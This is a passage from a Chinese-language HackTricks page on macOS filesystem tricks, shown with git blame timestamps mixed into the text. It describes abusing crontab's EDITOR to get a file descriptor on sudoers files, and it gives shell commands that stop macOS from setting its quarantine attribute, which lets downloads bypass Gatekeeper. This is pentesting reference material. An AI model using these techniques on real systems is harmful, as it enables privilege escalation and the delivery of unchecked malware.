2023-10-16 23:16:01 +00:00
|
|
|
|
# macOS文件系统技巧
|
|
|
|
|
|
|
|
|
|
|
|
<details>
|
|
|
|
|
|
|
|
|
|
|
|
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks云平台 ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
|
|
|
|
|
|
2023-10-17 17:42:58 +00:00
|
|
|
|
* 你在一家**网络安全公司**工作吗?你想在HackTricks中看到你的**公司广告**吗?或者你想获得**PEASS的最新版本或下载PDF格式的HackTricks**吗?请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
|
|
|
|
|
* 发现我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品[**The PEASS Family**](https://opensea.io/collection/the-peass-family)
|
2023-10-16 23:16:01 +00:00
|
|
|
|
* 获取[**官方PEASS和HackTricks周边产品**](https://peass.creator-spring.com)
|
2023-10-17 17:42:58 +00:00
|
|
|
|
* **加入**[**💬**](https://emojipedia.org/speech-balloon/) [**Discord群组**](https://discord.gg/hRep4RUj7f)或[**电报群组**](https://t.me/peass),或者**关注**我在**Twitter**上的[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
|
2023-10-16 23:16:01 +00:00
|
|
|
|
* **通过向**[**hacktricks repo**](https://github.com/carlospolop/hacktricks) **和**[**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **提交PR来分享你的黑客技巧。**
|
|
|
|
|
|
|
|
|
|
|
|
</details>
|
|
|
|
|
|
|
2023-10-17 17:42:58 +00:00
|
|
|
|
## 任意文件描述符(Arbitrary FD)
|
2023-10-16 23:16:01 +00:00
|
|
|
|
|
2023-10-17 17:42:58 +00:00
|
|
|
|
如果你能让一个**进程以高权限打开一个文件或文件夹**,你可以滥用**`crontab`**来以**`EDITOR=exploit.py`**的方式打开`/etc/sudoers.d`中的一个文件,这样`exploit.py`将获得`/etc/sudoers`中文件的文件描述符(FD)并进行滥用。
|
2023-10-16 23:16:01 +00:00
|
|
|
|
|
2023-10-17 17:42:58 +00:00
|
|
|
|
例如:[https://youtu.be/f1HA5QhLQ7Y?t=21098](https://youtu.be/f1HA5QhLQ7Y?t=21098)
|
|
|
|
|
|
|
|
|
|
|
|
## 避免隔离xattrs的技巧
|
|
|
|
|
|
|
|
|
|
|
|
### uchg标志
|
|
|
|
|
|
|
|
|
|
|
|
如果一个文件/文件夹具有这个不可变属性,就无法在其上放置xattr。
|
|
|
|
|
|
```bash
|
|
|
|
|
|
echo asd > /tmp/asd
|
|
|
|
|
|
chflags uchg /tmp/asd
|
|
|
|
|
|
xattr -w com.apple.quarantine "" /tmp/asd
|
|
|
|
|
|
xattr: [Errno 1] Operation not permitted: '/tmp/asd'
|
|
|
|
|
|
```
|
|
|
|
|
|
### defvfs 挂载
|
|
|
|
|
|
|
|
|
|
|
|
**devfs** 挂载**不支持 xattr**,更多信息请参考 [**CVE-2023-32364**](https://gergelykalman.com/CVE-2023-32364-a-macOS-sandbox-escape-by-mounting.html)
|
|
|
|
|
|
```bash
|
|
|
|
|
|
mkdir /tmp/mnt
|
|
|
|
|
|
mount_devfs -o noowners none "/tmp/mnt"
|
|
|
|
|
|
chmod 777 /tmp/mnt
|
|
|
|
|
|
mkdir /tmp/mnt/lol
|
|
|
|
|
|
xattr -w com.apple.quarantine "" /tmp/mnt/lol
|
|
|
|
|
|
xattr: [Errno 1] Operation not permitted: '/tmp/mnt/lol'
|
|
|
|
|
|
```
|
|
|
|
|
|
### writeextattr ACL
|
|
|
|
|
|
|
|
|
|
|
|
此ACL防止向文件添加`xattrs`。
|
|
|
|
|
|
```bash
|
|
|
|
|
|
rm -rf /tmp/test*
|
|
|
|
|
|
echo test >/tmp/test
|
|
|
|
|
|
chmod +a "everyone deny write,writeattr,writeextattr,writesecurity,chown" /tmp/test
|
|
|
|
|
|
ls -le /tmp/test
|
|
|
|
|
|
ditto -c -k test test.zip
|
|
|
|
|
|
# Download the zip from the browser and decompress it, the file should be without a quarantine xattr
|
|
|
|
|
|
|
|
|
|
|
|
cd /tmp
|
|
|
|
|
|
echo y | rm test
|
|
|
|
|
|
|
|
|
|
|
|
# Decompress it with ditto
|
|
|
|
|
|
ditto -x -k --rsrc test.zip .
|
|
|
|
|
|
ls -le /tmp/test
|
|
|
|
|
|
|
|
|
|
|
|
# Decompress it with open (if sandboxed decompressed files go to the Downloads folder)
|
|
|
|
|
|
open test.zip
|
|
|
|
|
|
sleep 1
|
|
|
|
|
|
ls -le /tmp/test
|
|
|
|
|
|
```
|
|
|
|
|
|
### **com.apple.acl.text权限**
|
|
|
|
|
|
|
|
|
|
|
|
**AppleDouble**文件格式会复制文件及其ACEs。
|
|
|
|
|
|
|
|
|
|
|
|
在[**源代码**](https://opensource.apple.com/source/Libc/Libc-391/darwin/copyfile.c.auto.html)中,可以看到存储在名为**`com.apple.acl.text`**的xattr中的ACL文本表示将被设置为解压后文件的ACL。因此,如果您将应用程序压缩为带有ACL的zip文件,并阻止其他xattr写入它...则隔离xattr不会设置到应用程序中:
|
|
|
|
|
|
|
|
|
|
|
|
有关更多信息,请查看[**原始报告**](https://www.microsoft.com/en-us/security/blog/2022/12/19/gatekeepers-achilles-heel-unearthing-a-macos-vulnerability/)。
|
2023-10-16 23:16:01 +00:00
|
|
|
|
|
|
|
|
|
|
<details>
|
|
|
|
|
|
|
2023-10-17 17:42:58 +00:00
|
|
|
|
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks云 ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
2023-10-16 23:16:01 +00:00
|
|
|
|
|
2023-10-17 17:42:58 +00:00
|
|
|
|
* 您在**网络安全公司**工作吗?您想在HackTricks中**宣传您的公司**吗?或者您想获得**PEASS的最新版本或下载PDF格式的HackTricks**吗?请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
|
|
|
|
|
* 发现我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品[**The PEASS Family**](https://opensea.io/collection/the-peass-family)
|
2023-10-16 23:16:01 +00:00
|
|
|
|
* 获取[**官方PEASS和HackTricks周边产品**](https://peass.creator-spring.com)
|
2023-10-17 17:42:58 +00:00
|
|
|
|
* **加入**[**💬**](https://emojipedia.org/speech-balloon/) [**Discord群组**](https://discord.gg/hRep4RUj7f)或[**电报群组**](https://t.me/peass),或在**Twitter**上**关注**我[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
|
|
|
|
|
|
* **通过向**[**hacktricks repo**](https://github.com/carlospolop/hacktricks) **和**[**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **提交PR来分享您的黑客技巧。**
|
2023-10-16 23:16:01 +00:00
|
|
|
|
|
|
|
|
|
|
</details>
|
